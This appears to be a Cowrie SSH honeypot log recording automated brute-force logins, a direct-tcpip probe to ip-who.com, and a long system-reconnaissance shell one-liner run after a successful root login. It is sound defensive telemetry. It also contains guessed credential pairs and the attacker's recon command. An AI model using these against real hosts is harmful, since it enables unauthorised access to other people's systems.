{"eventid":"cowrie.client.version","version":"SSH-2.0-AsyncSSH_2.1.0","message":"Remote SSH version: SSH-2.0-AsyncSSH_2.1.0","sensor":"my-vps","timestamp":"2025-08-31T05:00:23.393217Z","src_ip":"212.227.235.229","session":"be6b739c2c78"}
{"eventid":"cowrie.client.kex","hassh":"fda360b1b4f4d3455cb75c6e7edb1d11","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,curve448-sha512,ecdh-sha2-nistp521,ecdh-sha2-nistp384,ecdh-sha2-nistp256,ecdh-sha2-1.3.132.0.10,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha256,diffie-hellman-group15-sha512,diffie-hellman-group16-sha512,diffie-hellman-group17-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,rsa2048-sha256,rsa1024-sha1,ext-info-c;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc,blowfish-cbc,cast128-cbc,arcfour256,arcfour128,arcfour;umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-md5-etm@openssh.com,hmac-sha2-256-96-etm@openssh.com,hmac-sha2-512-96-etm@openssh.com,hmac-sha1-96-etm@openssh.com,hmac-md5-96-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-md5,hmac-sha2-256-96,hmac-sha2-512-96,hmac-sha1-96,hmac-md5-96;zlib@openssh.com,zlib,none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","curve448-sha512","ecdh-sha2-nistp521","ecdh-sha2-nistp384","ecdh-sha2-nistp256","ecdh-sha2-1.3.132.0.10","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha256","diffie-hellman-group15-sha512","diffie-hellman-group16-sha512","diffie-hellman-group17-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","rsa2048-sha256","rsa1024-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519-cert-v01@openssh.com","ssh-ed448-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-1.3.132.0.10-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ssh-ed25519","ssh-ed448","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","ecdsa-sha2-1.3.132.0.10","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc","blowfish-cbc","cast128-cbc","arcfour256","arcfour128","arcfour"],"macCS":["umac-64-etm@openssh.com","umac-128-etm@openssh.com","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-md5-etm@openssh.com","hmac-sha2-256-96-etm@openssh.com","hmac-sha2-512-96-etm@openssh.com","hmac-sha1-96-etm@openssh.com","hmac-md5-96-etm@openssh.com","umac-64@openssh.com","umac-128@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-md5","hmac-sha2-256-96","hmac-sha2-512-96","hmac-sha1-96","hmac-md5-96"],"compCS":["zlib@openssh.com","zlib","none"],"langCS":[""],"message":"SSH client hassh fingerprint: fda360b1b4f4d3455cb75c6e7edb1d11","sensor":"my-vps","timestamp":"2025-08-31T05:00:23.466235Z","src_ip":"212.227.235.229","session":"be6b739c2c78"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T05:00:23.562581Z","src_ip":"212.227.125.160","session":"8856983fbe5a"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T05:00:23.563293Z","src_ip":"212.227.125.160","session":"8856983fbe5a"}
{"eventid":"cowrie.login.failed","username":"temp1","password":"temp1","message":"login attempt [temp1/temp1] failed","sensor":"my-vps","timestamp":"2025-08-31T05:00:24.866730Z","src_ip":"212.227.235.229","session":"be6b739c2c78"}
{"eventid":"cowrie.session.closed","duration":"3.5","message":"Connection lost after 3.5 seconds","sensor":"my-vps","timestamp":"2025-08-31T05:00:26.748363Z","src_ip":"212.227.235.229","session":"be6b739c2c78"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":59454,"dst_ip":"1.2.3.4","dst_port":22,"session":"e4a5f06b15bb","protocol":"ssh","message":"New connection: 212.227.235.229:59454 (1.2.3.4:22) [session: e4a5f06b15bb]","sensor":"my-vps","timestamp":"2025-08-31T05:00:29.938544Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T05:00:29.939604Z","src_ip":"212.227.235.229","session":"e4a5f06b15bb"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T05:00:30.021393Z","src_ip":"212.227.235.229","session":"e4a5f06b15bb"}
{"eventid":"cowrie.login.failed","username":"sammy","password":"password","message":"login attempt [sammy/password] failed","sensor":"my-vps","timestamp":"2025-08-31T05:00:30.389388Z","src_ip":"212.227.235.229","session":"e4a5f06b15bb"}
{"eventid":"cowrie.session.closed","duration":"1.5","message":"Connection lost after 1.5 seconds","sensor":"my-vps","timestamp":"2025-08-31T05:00:31.473231Z","src_ip":"212.227.235.229","session":"e4a5f06b15bb"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":35366,"dst_ip":"1.2.3.4","dst_port":22,"session":"7ae56dbee3d0","protocol":"ssh","message":"New connection: 212.227.235.229:35366 (1.2.3.4:22) [session: 7ae56dbee3d0]","sensor":"my-vps","timestamp":"2025-08-31T05:00:32.738523Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-AsyncSSH_2.1.0","message":"Remote SSH version: SSH-2.0-AsyncSSH_2.1.0","sensor":"my-vps","timestamp":"2025-08-31T05:00:32.739654Z","src_ip":"212.227.235.229","session":"7ae56dbee3d0"}
{"eventid":"cowrie.client.kex","hassh":"fda360b1b4f4d3455cb75c6e7edb1d11","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,curve448-sha512,ecdh-sha2-nistp521,ecdh-sha2-nistp384,ecdh-sha2-nistp256,ecdh-sha2-1.3.132.0.10,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha256,diffie-hellman-group15-sha512,diffie-hellman-group16-sha512,diffie-hellman-group17-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,rsa2048-sha256,rsa1024-sha1,ext-info-c;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc,blowfish-cbc,cast128-cbc,arcfour256,arcfour128,arcfour;umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-md5-etm@openssh.com,hmac-sha2-256-96-etm@openssh.com,hmac-sha2-512-96-etm@openssh.com,hmac-sha1-96-etm@openssh.com,hmac-md5-96-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-md5,hmac-sha2-256-96,hmac-sha2-512-96,hmac-sha1-96,hmac-md5-96;zlib@openssh.com,zlib,none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","curve448-sha512","ecdh-sha2-nistp521","ecdh-sha2-nistp384","ecdh-sha2-nistp256","ecdh-sha2-1.3.132.0.10","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha256","diffie-hellman-group15-sha512","diffie-hellman-group16-sha512","diffie-hellman-group17-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","rsa2048-sha256","rsa1024-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519-cert-v01@openssh.com","ssh-ed448-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-1.3.132.0.10-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ssh-ed25519","ssh-ed448","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","ecdsa-sha2-1.3.132.0.10","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc","blowfish-cbc","cast128-cbc","arcfour256","arcfour128","arcfour"],"macCS":["umac-64-etm@openssh.com","umac-128-etm@openssh.com","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-md5-etm@openssh.com","hmac-sha2-256-96-etm@openssh.com","hmac-sha2-512-96-etm@openssh.com","hmac-sha1-96-etm@openssh.com","hmac-md5-96-etm@openssh.com","umac-64@openssh.com","umac-128@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-md5","hmac-sha2-256-96","hmac-sha2-512-96","hmac-sha1-96","hmac-md5-96"],"compCS":["zlib@openssh.com","zlib","none"],"langCS":[""],"message":"SSH client hassh fingerprint: fda360b1b4f4d3455cb75c6e7edb1d11","sensor":"my-vps","timestamp":"2025-08-31T05:00:33.040631Z","src_ip":"212.227.235.229","session":"7ae56dbee3d0"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":42236,"dst_ip":"1.2.3.4","dst_port":22,"session":"f74acf6b9881","protocol":"ssh","message":"New connection: 212.227.235.229:42236 (1.2.3.4:22) [session: f74acf6b9881]","sensor":"my-vps","timestamp":"2025-08-31T05:00:34.583089Z"}
{"eventid":"cowrie.login.success","username":"root","password":"pfsense","message":"login attempt [root/pfsense] succeeded","sensor":"my-vps","timestamp":"2025-08-31T05:00:34.768867Z","src_ip":"212.227.235.229","session":"7ae56dbee3d0"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"ip-who.com","dst_port":80,"src_ip":"212.227.235.229","src_port":0,"message":"direct-tcp connection request to ip-who.com:80 from :0","sensor":"my-vps","timestamp":"2025-08-31T05:00:35.112732Z","session":"7ae56dbee3d0"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"ip-who.com","dst_port":80,"data":"b'GET /json/ HTTP/1.1\\r\\nHost: ip-who.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to ip-who.com:80 with data b'GET /json/ HTTP/1.1\\r\\nHost: ip-who.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T05:00:35.379160Z","src_ip":"212.227.235.229","session":"7ae56dbee3d0"}
{"eventid":"cowrie.session.closed","duration":"2.9","message":"Connection lost after 2.9 seconds","sensor":"my-vps","timestamp":"2025-08-31T05:00:35.647392Z","src_ip":"212.227.235.229","session":"7ae56dbee3d0"}
{"eventid":"cowrie.login.failed","username":"ftp","password":"ftp123","message":"login attempt [ftp/ftp123] failed","sensor":"my-vps","timestamp":"2025-08-31T05:00:37.057183Z","src_ip":"212.227.125.160","session":"8856983fbe5a"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":39076,"dst_ip":"1.2.3.4","dst_port":22,"session":"58aeda65e7ec","protocol":"ssh","message":"New connection: 212.227.235.229:39076 (1.2.3.4:22) [session: 58aeda65e7ec]","sensor":"my-vps","timestamp":"2025-08-31T05:00:40.890285Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T05:00:41.599155Z","src_ip":"212.227.235.229","session":"58aeda65e7ec"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-31T05:00:41.600009Z","src_ip":"212.227.235.229","session":"58aeda65e7ec"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T05:00:42.461540Z","src_ip":"212.227.235.229","session":"f74acf6b9881"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T05:00:42.462708Z","src_ip":"212.227.235.229","session":"f74acf6b9881"}
{"eventid":"cowrie.login.success","username":"root","password":"P@ssw0rd123","message":"login attempt [root/P@ssw0rd123] succeeded","sensor":"my-vps","timestamp":"2025-08-31T05:00:47.449545Z","src_ip":"212.227.235.229","session":"58aeda65e7ec"}
{"eventid":"cowrie.session.closed","duration":"27.8","message":"Connection lost after 27.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T05:00:48.151422Z","src_ip":"212.227.125.160","session":"8856983fbe5a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T05:00:49.412807Z","src_ip":"212.227.235.229","session":"58aeda65e7ec"}
{"eventid":"cowrie.command.input","input":"uname=$(uname -s -v -n -m 2>/dev/null);; \t\tarch=$(uname -m 2>/dev/null);; \t\tuptime=$(awk '{u=int($1);d=int(u/86400);h=int((u%86400)/3600);m=int((u%3600)/60);s=\"\";if(d>0)s=s d\"d\";if(h>0){if(s!=\"\")s=s\", \";s=s h\"h\"}if(m>0||s==\"\"){if(s!=\"\")s=s\", \";s=s m\"m\"}print s}' /proc/uptime 2>/dev/null);; \t\t[ -z \"$uptime\" ] && secondsStr=$(cat /proc/uptime | cut -d' ' -f1 | cut -d. -f1) && [ -n \"$secondsStr\" ] && seconds=$((secondsStr)) && d=$((seconds/86400)) && h=$(( (seconds%86400)/3600 )) && m=$(( (seconds%3600)/60 )) && uptime=\"\" && [ $d -gt 0 ] && uptime=\"${uptime}${d}d\" && [ $h -gt 0 ] && { [ -n \"$uptime\" ] && uptime=\"$uptime, \"; uptime=\"${uptime}${h}h\"; } && { [ $m -gt 0 ] || [ -z \"$uptime\" ]; } && { [ -n \"$uptime\" ] && uptime=\"$uptime, \"; uptime=\"${uptime}${m}m\"; };; \t\tcpus=$( (nproc || grep -c \"^processor\" /proc/cpuinfo) 2>/dev/null | head -1);; \t\tcpu_model=$( (grep -m1 \"model name\" /proc/cpuinfo | cut -d: -f2 | sed 's/^ //;s/ *$//' || lscpu | grep -m1 \"Model name\" | cut -d: -f2 | sed 's/^ //;s/ *$//') 2>/dev/null);; \t\tgpu_info=$( (lspci | grep -i vga; lspci | grep -i nvidia) 2>/dev/null | head -n5);; \t\tcat_help=$((cat --help 2>&1 | tr '\\n' ' ') || cat --help 2>&1);; \t\tls_help=$((ls --help 2>&1 | tr '\\n' ' ') || ls --help 2>&1);; \t\tlast_output=$((last | tail -n 10) || last);; \t\techo \"UNAME:$uname\";; \t\techo \"ARCH:$arch\";; \t\techo \"UPTIME:$uptime\";; \t\techo \"CPUS:$cpus\";; \t\techo \"CPU_MODEL:$cpu_model\";; \t\techo \"GPU:$gpu_info\";; \t\techo \"CAT_HELP:$cat_help\";; \t\techo \"LS_HELP:$ls_help\";; \t\techo \"LAST:$last_output\";","message":"CMD: uname=$(uname -s -v -n -m 2>/dev/null);; \t\tarch=$(uname -m 2>/dev/null);; \t\tuptime=$(awk '{u=int($1);d=int(u/86400);h=int((u%86400)/3600);m=int((u%3600)/60);s=\"\";if(d>0)s=s d\"d\";if(h>0){if(s!=\"\")s=s\", \";s=s h\"h\"}if(m>0||s==\"\"){if(s!=\"\")s=s\", \";s=s m\"m\"}print s}' /proc/uptime 2>/dev/null);; \t\t[ -z \"$uptime\" ] && secondsStr=$(cat /proc/uptime | cut -d' ' -f1 | cut -d. -f1) && [ -n \"$secondsStr\" ] && seconds=$((secondsStr)) && d=$((seconds/86400)) && h=$(( (seconds%86400)/3600 )) && m=$(( (seconds%3600)/60 )) && uptime=\"\" && [ $d -gt 0 ] && uptime=\"${uptime}${d}d\" && [ $h -gt 0 ] && { [ -n \"$uptime\" ] && uptime=\"$uptime, \"; uptime=\"${uptime}${h}h\"; } && { [ $m -gt 0 ] || [ -z \"$uptime\" ]; } && { [ -n \"$uptime\" ] && uptime=\"$uptime, \"; uptime=\"${uptime}${m}m\"; };; \t\tcpus=$( (nproc || grep -c \"^processor\" /proc/cpuinfo) 2>/dev/null | head -1);; \t\tcpu_model=$( (grep -m1 \"model name\" /proc/cpuinfo | cut -d: -f2 | sed 's/^ //;s/ *$//' || lscpu | grep -m1 \"Model name\" | cut -d: -f2 | sed 's/^ //;s/ *$//') 2>/dev/null);; \t\tgpu_info=$( (lspci | grep -i vga; lspci | grep -i nvidia) 2>/dev/null | head -n5);; \t\tcat_help=$((cat --help 2>&1 | tr '\\n' ' ') || cat --help 2>&1);; \t\tls_help=$((ls --help 2>&1 | tr '\\n' ' ') || ls --help 2>&1);; \t\tlast_output=$((last | tail -n 10) || last);; \t\techo \"UNAME:$uname\";; \t\techo \"ARCH:$arch\";; \t\techo \"UPTIME:$uptime\";; \t\techo \"CPUS:$cpus\";; \t\techo \"CPU_MODEL:$cpu_model\";; \t\techo \"GPU:$gpu_info\";; \t\techo \"CAT_HELP:$cat_help\";; \t\techo \"LS_HELP:$ls_help\";; \t\techo \"LAST:$last_output\";","sensor":"my-vps","timestamp":"2025-08-31T05:00:49.413830Z","src_ip":"212.227.235.229","session":"58aeda65e7ec"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -m 2 > /dev/null","message":"CMD: uname -s -v -n -m 2 > /dev/null","sensor":"my-vps","timestamp":"2025-08-31T05:00:49.414731Z","src_ip":"212.227.235.229","session":"58aeda65e7ec"}
{"eventid":"cowrie.command.input","input":"uname -m 2 > /dev/null","message":"CMD: uname -m 2 > /dev/null","sensor":"my-vps","timestamp":"2025-08-31T05:00:49.416140Z","src_ip":"212.227.235.229","session":"58aeda65e7ec"}
{"eventid":"cowrie.command.input","input":"awk {u=int($1","message":"CMD: awk {u=int($1","sensor":"my-vps","timestamp":"2025-08-31T05:00:49.417383Z","src_ip":"212.227.235.229","session":"58aeda65e7ec"}
{"eventid":"cowrie.command.input","input":"cat /proc/uptime | cut -d -f1 | cut -d. -f1","message":"CMD: cat /proc/uptime | cut -d -f1 | cut -d. -f1","sensor":"my-vps","timestamp":"2025-08-31T05:00:49.418051Z","src_ip":"212.227.235.229","session":"58aeda65e7ec"}
{"eventid":"cowrie.command.failed","input":"cat /proc/uptime | cut -d -f1 | cut -d. -f1","message":"Command not found: cat /proc/uptime | cut -d -f1 | cut -d. -f1","sensor":"my-vps","timestamp":"2025-08-31T05:00:49.418988Z","src_ip":"212.227.235.229","session":"58aeda65e7ec"}
{"eventid":"cowrie.command.input","input":"(secondsStr","message":"CMD: (secondsStr","sensor":"my-vps","timestamp":"2025-08-31T05:00:49.420441Z","src_ip":"212.227.235.229","session":"58aeda65e7ec"}
{"eventid":"cowrie.command.input","input":"(seconds/86400","message":"CMD: (seconds/86400","sensor":"my-vps","timestamp":"2025-08-31T05:00:49.420897Z","src_ip":"212.227.235.229","session":"58aeda65e7ec"}
{"eventid":"cowrie.command.input","input":"( (seconds%86400","message":"CMD: ( (seconds%86400","sensor":"my-vps","timestamp":"2025-08-31T05:00:49.421546Z","src_ip":"212.227.235.229","session":"58aeda65e7ec"}
{"eventid":"cowrie.command.input","input":"(seconds%86400","message":"CMD: (seconds%86400","sensor":"my-vps","timestamp":"2025-08-31T05:00:49.422197Z","src_ip":"212.227.235.229","session":"58aeda65e7ec"}
{"eventid":"cowrie.command.input","input":"( (seconds%3600","message":"CMD: ( (seconds%3600","sensor":"my-vps","timestamp":"2025-08-31T05:00:49.423006Z","src_ip":"212.227.235.229","session":"58aeda65e7ec"}
{"eventid":"cowrie.command.input","input":"(seconds%3600","message":"CMD: (seconds%3600","sensor":"my-vps","timestamp":"2025-08-31T05:00:49.423429Z","src_ip":"212.227.235.229","session":"58aeda65e7ec"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/1b20a210fe96e5a8abc347dfb91d7befecb4b5f9b7ed40d856410fac15952057","shasum":"1b20a210fe96e5a8abc347dfb91d7befecb4b5f9b7ed40d856410fac15952057","destfile":"/dev/null","message":"Saved redir contents with SHA-256 1b20a210fe96e5a8abc347dfb91d7befecb4b5f9b7ed40d856410fac15952057 to var/lib/cowrie/downloads/1b20a210fe96e5a8abc347dfb91d7befecb4b5f9b7ed40d856410fac15952057","sensor":"my-vps","timestamp":"2025-08-31T05:00:50.274386Z","src_ip":"212.227.235.229","session":"58aeda65e7ec"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/ca88d8e2c0cfe079cce0e55390ff79932c81d831016d8b2dfa21f7db9a052f8c","size":74,"shasum":"ca88d8e2c0cfe079cce0e55390ff79932c81d831016d8b2dfa21f7db9a052f8c","duplicate":true,"duration":"0.9","message":"Closing TTY Log: var/lib/cowrie/tty/ca88d8e2c0cfe079cce0e55390ff79932c81d831016d8b2dfa21f7db9a052f8c after 0.9 seconds","sensor":"my-vps","timestamp":"2025-08-31T05:00:50.275404Z","src_ip":"212.227.235.229","session":"58aeda65e7ec"}
{"eventid":"cowrie.session.closed","duration":"9.4","message":"Connection lost after 9.4 seconds","sensor":"my-vps","timestamp":"2025-08-31T05:00:50.276589Z","src_ip":"212.227.235.229","session":"58aeda65e7ec"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":44860,"dst_ip":"1.2.3.4","dst_port":22,"session":"8fc312c33a88","protocol":"ssh","message":"New connection: 212.227.125.160:44860 (1.2.3.4:22) [session: 8fc312c33a88]","sensor":"my-vps","timestamp":"2025-08-31T05:00:55.453823Z"}
